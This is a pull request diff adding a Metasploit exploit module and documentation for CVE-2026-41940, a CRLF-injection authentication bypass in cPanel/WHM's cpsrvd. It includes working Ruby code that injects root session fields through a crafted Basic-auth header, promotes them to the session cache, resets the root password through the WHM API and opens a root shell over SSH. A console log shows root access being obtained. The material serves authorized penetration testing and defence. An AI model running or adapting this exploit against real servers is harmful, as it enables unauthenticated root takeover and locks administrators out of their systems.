### PR TITLE
Add exploit for cPanel/WHM auth bypass RCE (CVE-2026-41940)

### DIFF
--- a/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
+++ b/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
@@ -49,16 +49,19 @@ See the [cPanel advisory](https://support.cpanel.net/hc/en-us/articles/400737875
 1. Provision a fresh AlmaLinux 8 server.
 
 2. Install cPanel/WHM:
-   ```bash
-   cd /home && curl -o latest -L https://securedownloads.cpanel.net/latest && sh latest
-   ```
+
+```bash
+cd /home && curl -o latest -L https://securedownloads.cpanel.net/latest && sh latest
+```
+
    The installer pulls the latest build. Any version before the fix (see Affected Versions) is
    vulnerable. To prevent auto-update after install, add `CPANEL=11.136` to `/etc/cpupdate.conf`.
 
 3. Verify the installed version is vulnerable:
-   ```bash
-   cat /usr/local/cpanel/version
-   ```
+
+```bash
+cat /usr/local/cpanel/version
+```
 
 4. WHM is accessible at `https://<ip>:2087`.
 
@@ -76,19 +79,6 @@ See the [cPanel advisory](https://support.cpanel.net/hc/en-us/articles/400737875
    root password to a fresh random value.
 
 ## Options
-
-### TARGETURI
-
-Base path to the WHM service. Default: `/`.
-
-When management ports (2087/2083) are firewalled, cPanel's Apache proxy exposes the WHM service
-via `/___proxy_subdomain_whm/` on any virtual host (ports 80/443). To exploit through this path:
-
-```
-set TARGETURI /___proxy_subdomain_whm/
-set RPORT 443
-set VHOST whm.example.com
-```
 
 ### SSHPORT
 

--- a/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
+++ b/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
@@ -16,7 +16,7 @@ root-level WHM authentication.
 
 RCE is achieved by calling the authenticated WHM JSON API `passwd` endpoint to change the root
 system password to a known temporary value, then connecting over SSH to execute the payload. The
-temporary password is rotated to a fresh random value in the `ensure` block after exploitation.
+temporary password is rotated to a fresh random value after exploitation.
 
 > **Warning:** This module is destructive. It changes the root password and does not restore the
 > original value.
@@ -70,7 +70,7 @@ See the [cPanel advisory](https://support.cpanel.net/hc/en-us/articles/400737875
 1. `set RPORT 2087`
 1. `set SSL true`
 1. `check` - confirm the target is vulnerable before running the exploit
-1. `set ALLOW_PASSWORD_CHANGE true`
+1. `set DefangedMode false`
 1. `run`
 1. A root shell session opens via SSH. After the session is established, the module rotates the
    root password to a fresh random value.
@@ -95,11 +95,11 @@ set VHOST whm.example.com
 SSH port on the target used for payload delivery after the root password is changed.
 Default: `22`.
 
-### ALLOW_PASSWORD_CHANGE
+### DefangedMode
 
-Safety guard to prevent accidental destructive runs. Default: `false`.
+Safety gate to prevent accidental destructive runs. Default: `true` (blocked).
 
-Must be set to `true` before `run`. The exploit changes the root password and does not restore
+Must be set to `false` before `run`. The exploit changes the root password and does not restore
 the original value.
 
 ## Scenarios
@@ -134,8 +134,8 @@ msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set RPORT 2087
 RPORT => 2087
 msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set SSL true
 SSL => true
-msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set ALLOW_PASSWORD_CHANGE true
-ALLOW_PASSWORD_CHANGE => true
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set DefangedMode false
+DefangedMode => false
 msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. CRLF injection confirmed: expired_session marker detected

--- a/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
+++ b/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
@@ -1,0 +1,165 @@
+## Vulnerable Application
+
+This module exploits CVE-2026-41940, a CRLF injection vulnerability in cPanel/WHM's session
+management daemon (`cpsrvd`) that allows an unauthenticated remote attacker to inject arbitrary
+fields into a session file and obtain a root-level WHM session, leading to remote code execution
+as root.
+
+`cpsrvd`'s HTTP Basic-auth handler passes the password value to `saveSession()` without stripping
+newline characters (`\n`). When a session cookie is presented without its ob-part (the `,<hex>`
+suffix), the ob-encoder is bypassed and the raw password (including injected newlines) is written
+verbatim to the raw session file at `/var/cpanel/sessions/raw/<session>`. A subsequent unauthenticated
+request to `/scripts2/listaccts` (which has no valid security token) fires the `do_token_denied`
+gadget, causing `Cpanel::Session::Modify` to promote all top-level fields from the raw file into the
+authoritative JSON session cache at `/var/cpanel/sessions/cache/<session>`. The injected fields grant
+root-level WHM authentication.
+
+RCE is achieved by calling the authenticated WHM JSON API `passwd` endpoint to change the root
+system password to a known temporary value, then connecting over SSH to execute the payload. The
+temporary password is rotated to a fresh random value in the `ensure` block after exploitation.
+
+> **Warning:** This module is destructive. It changes the root password and does not restore the
+> original value.
+
+### Affected Versions
+
+All cPanel/WHM versions after 11.40 are affected. Fixed per branch:
+
+- 11.86.0.41
+- 11.110.0.97
+- 11.118.0.63
+- 11.124.0.35
+- 11.126.0.54
+- 11.130.0.19
+- 11.132.0.29
+- 11.134.0.20
+- 11.136.0.5
+- WP2 136.1.7
+
+Confirmed vulnerable: cPanel/WHM 11.136.0.4 (LSWS/AlmaLinux 8).
+
+See the [cPanel advisory](https://support.cpanel.net/hc/en-us/articles/40073787579671) for details.
+
+### Setting Up a Vulnerable Test Environment
+
+> **Note:** The `check` method works on any cPanel/WHM install. The full exploit (`passwd` API +
+> SSH) requires the target to have a valid cPanel license; the `passwd` API returns HTTP 500 on
+> unlicensed servers.
+
+1. Provision a fresh AlmaLinux 8 server.
+
+2. Install cPanel/WHM:
+   ```bash
+   cd /home && curl -o latest -L https://securedownloads.cpanel.net/latest && sh latest
+   ```
+   The installer pulls the latest build. Any version before the fix (see Affected Versions) is
+   vulnerable. To prevent auto-update after install, add `CPANEL=11.136` to `/etc/cpupdate.conf`.
+
+3. Verify the installed version is vulnerable:
+   ```bash
+   cat /usr/local/cpanel/version
+   ```
+
+4. WHM is accessible at `https://<ip>:2087`.
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. `use exploit/multi/http/cpanel_whm_auth_bypass_rce`
+1. `set RHOSTS <target>`
+1. `set RPORT 2087`
+1. `set SSL true`
+1. `check` - confirm the target is vulnerable before running the exploit
+1. `set ALLOW_PASSWORD_CHANGE true`
+1. `run`
+1. A root shell session opens via SSH. After the session is established, the module rotates the
+   root password to a fresh random value.
+
+## Options
+
+### TARGETURI
+
+Base path to the WHM service. Default: `/`.
+
+When management ports (2087/2083) are firewalled, cPanel's Apache proxy exposes the WHM service
+via `/___proxy_subdomain_whm/` on any virtual host (ports 80/443). To exploit through this path:
+
+```
+set TARGETURI /___proxy_subdomain_whm/
+set RPORT 443
+set VHOST whm.example.com
+```
+
+### SSHPORT
+
+SSH port on the target used for payload delivery after the root password is changed.
+Default: `22`.
+
+### ALLOW_PASSWORD_CHANGE
+
+Safety guard to prevent accidental destructive runs. Default: `false`.
+
+Must be set to `true` before `run`. The exploit changes the root password and does not restore
+the original value.
+
+## Scenarios
+
+### check - cPanel/WHM 11.136.0.4 on AlmaLinux 8 (unlicensed)
+
+The `check` method uses a non-destructive 3-step technique (injecting `expired=1` for a random
+non-root username) to confirm the CRLF injection is unfiltered without triggering any lockout or
+creating a persistent authenticated session.
+
+```
+msf6 > use exploit/multi/http/cpanel_whm_auth_bypass_rce
+[*] No payload configured, defaulting to cmd/unix/interact
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set RHOSTS 192.168.80.131
+RHOSTS => 192.168.80.131
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set RPORT 2087
+RPORT => 2087
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set SSL true
+SSL => true
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > check
+[+] 192.168.80.131:2087 - The target is vulnerable. CRLF injection confirmed: expired_session marker detected
+```
+
+### run - cPanel/WHM 11.136.0.4 on AlmaLinux 8 (licensed target)
+
+```
+msf6 > use exploit/multi/http/cpanel_whm_auth_bypass_rce
+[*] No payload configured, defaulting to cmd/unix/interact
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set RHOSTS 192.168.80.131
+RHOSTS => 192.168.80.131
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set RPORT 2087
+RPORT => 2087
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set SSL true
+SSL => true
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > set ALLOW_PASSWORD_CHANGE true
+ALLOW_PASSWORD_CHANGE => true
+msf6 exploit(multi/http/cpanel_whm_auth_bypass_rce) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. CRLF injection confirmed: expired_session marker detected
+[*] Minting pre-auth session
+[*] Injecting session fields via CRLF
+[*] Triggering session cache promotion
+[*] Verifying WHM root access
+[+] Auth bypass successful - root WHM session obtained
+[*] Setting temporary root password
+[+] Root password set
+[*] Connecting via SSH
+[*] Rotating root password
+[+] Root password rotated
+[*] Found shell.
+[*] Command shell session 1 opened (192.168.80.130:44969 -> 192.168.80.131:22) at 2026-05-06 16:26:27 +0100
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+hostname
+192-168-122-130.cprapid.com
+cat /etc/redhat-release
+AlmaLinux release 8.10 (Cerulean Leopard)
+```
+
+> **Note:** The module rotates the temporary root password before opening the session.
+> If cpsrvd's license cache has expired, rotation may fail and the module will print a
+> warning. The temporary password is then still set; change it manually via SSH.

--- a/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
+++ b/documentation/modules/exploit/multi/http/cpanel_whm_auth_bypass_rce.md
@@ -40,7 +40,7 @@ Confirmed vulnerable: cPanel/WHM 11.136.0.4 (LSWS/AlmaLinux 8).
 
 See the [cPanel advisory](https://support.cpanel.net/hc/en-us/articles/40073787579671) for details.
 
-### Setting Up a Vulnerable Test Environment
+### Setup
 
 > **Note:** The `check` method works on any cPanel/WHM install. The full exploit (`passwd` API +
 > SSH) requires the target to have a valid cPanel license; the `passwd` API returns HTTP 500 on

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::SSH
+  include Msf::Exploit::Retry
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -62,11 +63,10 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Privileged' => true,
         'Targets' => [
-          ['Unix Command', {}],
+          ['Automatic', {}],
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/interact',
           'RPORT' => 2087,
           'SSL' => true
         },
@@ -81,7 +81,11 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'WHM base path', '/']),
       OptPort.new('SSHPORT', [true, 'SSH port on the target', 22]),
-      OptBool.new('ALLOW_PASSWORD_CHANGE', [true, 'Acknowledge that this module changes the root password', false]),
+      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),
+    ])
+    register_advanced_options([
+      OptInt.new('VERIFY_TIMEOUT', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10]),
+      OptString.new('TMP_PASSWORD', [false, 'Temporary root password during exploitation (randomly generated if unset; must meet cPanel complexity requirements: uppercase, lowercase, digit, special character)', nil]),
     ])
   end
 
@@ -139,24 +143,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def verify_auth_bypass(session_name, token)
-    # Retry up to 3 times with a 2-second sleep between attempts (total ~4 seconds max).
+    # Retry until /json-api/version confirms auth or VERIFY_TIMEOUT is reached.
     # do_token_denied promotes the raw session fields to the JSON cache asynchronously;
     # the first attempt may arrive before cpsrvd finishes writing the JSON cache file.
-    3.times do |attempt|
+    retry_until_truthy(timeout: datastore['VERIFY_TIMEOUT']) do
       res = send_request_cgi(
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, token, 'json-api', 'version'),
         'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
       )
-      return true if res&.code == 200 && res.body.to_s.include?('"version"')
-
-      if attempt < 2
-        vprint_status("Auth bypass not yet confirmed (attempt #{attempt + 1}/3), retrying...")
-        Rex.sleep(2)
-      end
+      res&.code == 200 && res.body.to_s.include?('"version"')
     end
-
-    false
   end
 
   def whm_api_call(session_name, token, function, params = {})
@@ -220,12 +217,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless datastore['ALLOW_PASSWORD_CHANGE']
-      fail_with(Failure::BadConfig,
-                'Set ALLOW_PASSWORD_CHANGE true to acknowledge this module changes the root password')
+    if datastore['DefangedMode']
+      fail_with(Failure::BadConfig, <<~MSG)
+        This module permanently changes the root password on the target system
+        and does not restore the original value. Set DefangedMode to false if
+        you have authorization to proceed.
+      MSG
     end
 
-    tmp_pass = Rex::Text.rand_text_alphanumeric(16) + '!aA1'
+    tmp_pass = datastore['TMP_PASSWORD'] || (Rex::Text.rand_text_alphanumeric(16) + '!aA1')
 
     print_status('Minting pre-auth session')
     session_name = mint_session
@@ -307,6 +307,17 @@ class MetasploitModule < Msf::Exploit::Remote
         whm_api_call(session_name, token, 'passwd', 'user' => 'root', 'password' => new_pass)
         print_good('Root password rotated')
         @tmp_pass_set = false
+        store_valid_credential(
+          user: 'root',
+          private: new_pass,
+          service_data: {
+            address: rhost,
+            port: datastore['SSHPORT'],
+            service_name: 'ssh',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+          }
+        )
       rescue StandardError
         # If the passwd call fails (likely due to session expiration before rotation),
         # re-exploit to get a fresh auth bypass session and retry rotation.
@@ -317,6 +328,17 @@ class MetasploitModule < Msf::Exploit::Remote
           whm_api_call(sn2, tok2, 'passwd', 'user' => 'root', 'password' => new_pass)
           print_good('Root password rotated')
           @tmp_pass_set = false
+          store_valid_credential(
+            user: 'root',
+            private: new_pass,
+            service_data: {
+              address: rhost,
+              port: datastore['SSHPORT'],
+              service_name: 'ssh',
+              protocol: 'tcp',
+              workspace_id: myworkspace_id
+            }
+          )
         rescue StandardError => e
           print_warning("Could not rotate root password: #{e.message}")
           print_warning('Root password may still be set to the temporary value')

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -145,10 +145,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def verify_auth_bypass(session_name, token)
-    # Retry until /json-api/version confirms auth or VERIFY_TIMEOUT is reached.
+    # Retry until /json-api/version confirms auth or VerifyTimeout is reached.
     # do_token_denied promotes the raw session fields to the JSON cache asynchronously;
     # the first attempt may arrive before cpsrvd finishes writing the JSON cache file.
-    retry_until_truthy(timeout: datastore['VERIFY_TIMEOUT']) do
+    retry_until_truthy(timeout: datastore['VerifyTimeout']) do
       res = send_request_cgi(
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, token, 'json-api', 'version'),

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}"
       }
     )
-    return CheckCode::Unknown('No response from injection step') unless res2
+    return CheckCode::Detected('Service is running but injection endpoint did not respond') unless res2
 
     m2 = res2.headers['Location'].to_s.match(%r{(/cpsess\d{10})})
     return CheckCode::Safe('No cpsess token - injection did not land') unless m2
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, m2[1], '/'),
       'headers' => { 'Cookie' => "whostmgrsession=#{cookie_full_raw}" }
     )
-    return CheckCode::Unknown('No response from session verification step') unless res3
+    return CheckCode::Detected('Service is running and injection landed (cpsess token obtained), but verification request did not respond') unless res3
 
     body = res3.body.to_s
     if body.include?('expired_session') || body.include?('msg_code')

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -85,7 +85,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
     register_advanced_options([
       OptInt.new('VERIFY_TIMEOUT', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10]),
-      OptString.new('TMP_PASSWORD', [false, 'Temporary root password during exploitation (randomly generated if unset; must meet cPanel complexity requirements: uppercase, lowercase, digit, special character)', nil]),
     ])
   end
 
@@ -225,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
       MSG
     end
 
-    tmp_pass = datastore['TMP_PASSWORD'] || (Rex::Text.rand_text_alphanumeric(16) + '!aA1')
+    tmp_pass = Rex::Text.rand_text_alphanumeric(16) + '!aA1'
 
     print_status('Minting pre-auth session')
     session_name = mint_session

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -82,11 +82,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'WHM base path', '/']),
-      OptPort.new('SSHPORT', [true, 'SSH port on the target', 22]),
-      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),
+      OptPort.new('SSHPORT', [true, 'SSH port on the target', 22])
     ])
+
     register_advanced_options([
-      OptInt.new('VerifyTimeout', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10]),
+      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),
+      OptInt.new('VerifyTimeout', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10])
     ])
   end
 

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -139,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def verify_auth_bypass(session_name, token)
-    # Retry up to 3 times with a brief sleep between attempts.
+    # Retry up to 3 times with a 2-second sleep between attempts (total ~4 seconds max).
     # do_token_denied promotes the raw session fields to the JSON cache asynchronously;
-    # the first attempt may arrive before cpsrvd finishes writing.
+    # the first attempt may arrive before cpsrvd finishes writing the JSON cache file.
     3.times do |attempt|
       res = send_request_cgi(
         'method' => 'GET',
@@ -263,6 +263,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'WHM passwd API requires a valid cPanel license')
     end
 
+    # cPanel versions have two different passwd API response formats:
+    # - Older versions: {"status": 1, ...}
+    # - Newer versions: {"metadata": {"result": 1}, ...}
+    # Accept either to maintain compatibility across versions.
     passwd_ok = passwd_json&.[]('status') == 1 || passwd_json&.dig('metadata', 'result') == 1
     unless res.code == 200 && passwd_ok
       fail_with(Failure::UnexpectedReply, "passwd API returned HTTP #{res.code}: #{body[0..200]}")
@@ -289,7 +293,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Use the SSH channel directly as the session.
-    # handler(conn.lsock) must be the LAST call — it notifies the session waiter
+    # handler(conn.lsock) must be the LAST call - it notifies the session waiter
     # event that ExploitDriver polls after exploit() returns.
     conn = Net::SSH::CommandStream.new(ssh)
 
@@ -304,6 +308,8 @@ class MetasploitModule < Msf::Exploit::Remote
         print_good('Root password rotated')
         @tmp_pass_set = false
       rescue StandardError
+        # If the passwd call fails (likely due to session expiration before rotation),
+        # re-exploit to get a fresh auth bypass session and retry rotation.
         begin
           sn2 = mint_session
           tok2 = inject_session_fields(sn2)
@@ -324,6 +330,8 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_instance.send(:pending_connections=, pc + 1)
     handler(conn.lsock)
   ensure
+    # If an exception was raised after password change but before session opens,
+    # warn the operator that temporary credentials may still be active.
     if @tmp_pass_set
       print_warning('Root password may still be set to the temporary value')
     end

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -84,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),
     ])
     register_advanced_options([
-      OptInt.new('VERIFY_TIMEOUT', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10]),
+      OptInt.new('VerifyTimeout', [true, 'Seconds to wait for auth bypass to be confirmed after session cache promotion', 10]),
     ])
   end
 
@@ -217,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if datastore['DefangedMode']
-      fail_with(Failure::BadConfig, <<~MSG)
+      fail_with(Failure::BadConfig, <<~MSG.squish)
         This module permanently changes the root password on the target system
         and does not restore the original value. Set DefangedMode to false if
         you have authorization to proceed.
@@ -294,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Use the SSH channel directly as the session.
     # handler(conn.lsock) must be the LAST call - it notifies the session waiter
     # event that ExploitDriver polls after exploit() returns.
-    conn = Net::SSH::CommandStream.new(ssh)
+    conn = Net::SSH::CommandStream.new(ssh, logger: self)
 
     # Rotate the temporary password before handing off to the session.
     # This ensures the temp cred is short-lived even if the operator never
@@ -348,10 +350,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    # Signal that a connection is pending so wait_for_session blocks until
-    # the session scheduler completes registration rather than timing out.
-    pc = payload_instance.send(:pending_connections)
-    payload_instance.send(:pending_connections=, pc + 1)
     handler(conn.lsock)
   ensure
     # If an exception was raised after password change but before session opens,

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -303,21 +303,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if @tmp_pass_set
       print_status('Rotating root password')
       new_pass = Rex::Text.rand_text_alphanumeric(20) + '!aA1'
+      rotated = false
       begin
         whm_api_call(session_name, token, 'passwd', 'user' => 'root', 'password' => new_pass)
         print_good('Root password rotated')
         @tmp_pass_set = false
-        store_valid_credential(
-          user: 'root',
-          private: new_pass,
-          service_data: {
-            address: rhost,
-            port: datastore['SSHPORT'],
-            service_name: 'ssh',
-            protocol: 'tcp',
-            workspace_id: myworkspace_id
-          }
-        )
+        rotated = true
       rescue StandardError
         # If the passwd call fails (likely due to session expiration before rotation),
         # re-exploit to get a fresh auth bypass session and retry rotation.
@@ -328,10 +319,23 @@ class MetasploitModule < Msf::Exploit::Remote
           whm_api_call(sn2, tok2, 'passwd', 'user' => 'root', 'password' => new_pass)
           print_good('Root password rotated')
           @tmp_pass_set = false
+          rotated = true
+        rescue StandardError => e
+          print_warning("Could not rotate root password: #{e.message}")
+          print_warning('Root password may still be set to the temporary value')
+        end
+      end
+
+      # Store credential separately so a database error does not trigger re-exploitation.
+      # origin_type :service is required by create_credential_and_login when service_data
+      # is explicitly provided.
+      if rotated
+        begin
           store_valid_credential(
             user: 'root',
             private: new_pass,
             service_data: {
+              origin_type: :service,
               address: rhost,
               port: datastore['SSHPORT'],
               service_name: 'ssh',
@@ -340,8 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           )
         rescue StandardError => e
-          print_warning("Could not rotate root password: #{e.message}")
-          print_warning('Root password may still be set to the temporary value')
+          vprint_warning("Could not save credential to database: #{e.message}")
         end
       end
     end

--- a/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/cpanel_whm_auth_bypass_rce.rb
@@ -1,0 +1,340 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SSH
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'cPanel/WHM CRLF Injection Authentication Bypass RCE',
+        'Description' => %q{
+          Exploits CVE-2026-41940, a CRLF injection in cPanel/WHM's cpsrvd daemon
+          that allows unauthenticated remote code execution as root.
+
+          The Basic-auth handler writes the password to the raw session file without
+          stripping newlines. Omitting the ob-part of the session cookie bypasses the
+          encoder, so injected fields land verbatim in the raw file. A subsequent
+          request to /scripts2/listaccts triggers Cpanel::Session::Modify to promote
+          those fields into the authoritative session cache, granting root WHM access.
+
+          RCE uses the WHM JSON API passwd endpoint to set a temporary root password,
+          then delivers the payload over SSH. The password is rotated after exploitation.
+          This module does not restore the original root password.
+
+          Affects all versions after 11.40. Fixed per branch: 11.86.0.41, 11.110.0.97,
+          11.118.0.63, 11.124.0.35, 11.126.0.54, 11.130.0.19, 11.132.0.29, 11.134.0.20,
+          11.136.0.5 (cPanel/WHM) and 136.1.7 (WP2).
+        },
+        'Author' => [
+          'Sina Kheirkhah', # Initial analysis and PoC (watchTowr)
+          'Adam Kues',      # High-fidelity check technique (SLC Cyber)
+          'Shubham Shah',   # High-fidelity check technique (SLC Cyber)
+          'Crypto-Cat',     # Metasploit module (Rapid7)
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-41940'],
+          ['URL', 'https://support.cpanel.net/hc/en-us/articles/40073787579671'],
+          ['URL', 'https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/'],
+          ['URL', 'https://slcyber.io/research-center/high-fidelity-check-for-the-cpanel-authentication-bypass-cve-2026-41940/'],
+          ['URL', 'https://www.rapid7.com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass/'],
+        ],
+        'DisclosureDate' => '2026-04-28',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+        'Privileged' => true,
+        'Targets' => [
+          ['Unix Command', {}],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/interact',
+          'RPORT' => 2087,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'WHM base path', '/']),
+      OptPort.new('SSHPORT', [true, 'SSH port on the target', 22]),
+      OptBool.new('ALLOW_PASSWORD_CHANGE', [true, 'Acknowledge that this module changes the root password', false]),
+    ])
+  end
+
+  def mint_session
+    # Random username avoids cpHulk lockout; any user works on WHM for session minting
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'vars_get' => { 'login_only' => '1' },
+      'vars_post' => { 'user' => Rex::Text.rand_text_alpha(8), 'pass' => Rex::Text.rand_text_alpha(12) }
+    )
+    fail_with(Failure::Unreachable, 'No response from /login') unless res
+
+    # MSF joins multiple Set-Cookie headers into one string; use get_cookies
+    m = res.get_cookies.match(/(?:\A|;\s*)whostmgrsession=([^;,\s]+)/i)
+    fail_with(Failure::UnexpectedReply, 'No whostmgrsession cookie in /login response') unless m
+
+    session_name = Rex::Text.uri_decode(m[1]).split(',', 2).first
+    vprint_status("Session name: #{session_name}")
+    session_name
+  end
+
+  def inject_session_fields(session_name)
+    # \xff prefix bypasses set_pass() \x00 check; LF-only separates injected fields
+    raw_creds = "root:\xff\nsuccessful_internal_auth_with_timestamp=9999999999\nuser=root\ntfa_verified=1\nhasroot=1"
+    cookie_enc = Rex::Text.uri_encode(session_name)
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => {
+        'Authorization' => "Basic #{Rex::Text.encode_base64(raw_creds)}",
+        'Cookie' => "whostmgrsession=#{cookie_enc}"
+      }
+    )
+    fail_with(Failure::Unreachable, 'No response from /') unless res
+
+    m = res.headers['Location'].to_s.match(%r{(/cpsess\d{10})})
+    fail_with(Failure::NotVulnerable, "No /cpsessXXXX token in redirect (HTTP #{res.code}). Target may be patched.") unless m
+
+    vprint_status("Security token: #{m[1]}")
+    m[1]
+  end
+
+  def promote_session_cache(session_name)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'scripts2', 'listaccts'),
+      'headers' => { 'Cookie' => "whostmgrsession=#{Rex::Text.uri_encode(session_name)}" }
+    )
+    fail_with(Failure::Unreachable, 'No response from /scripts2/listaccts') unless res
+    fail_with(Failure::UnexpectedReply, "Unexpected response from listaccts (HTTP #{res.code})") unless res.code == 401
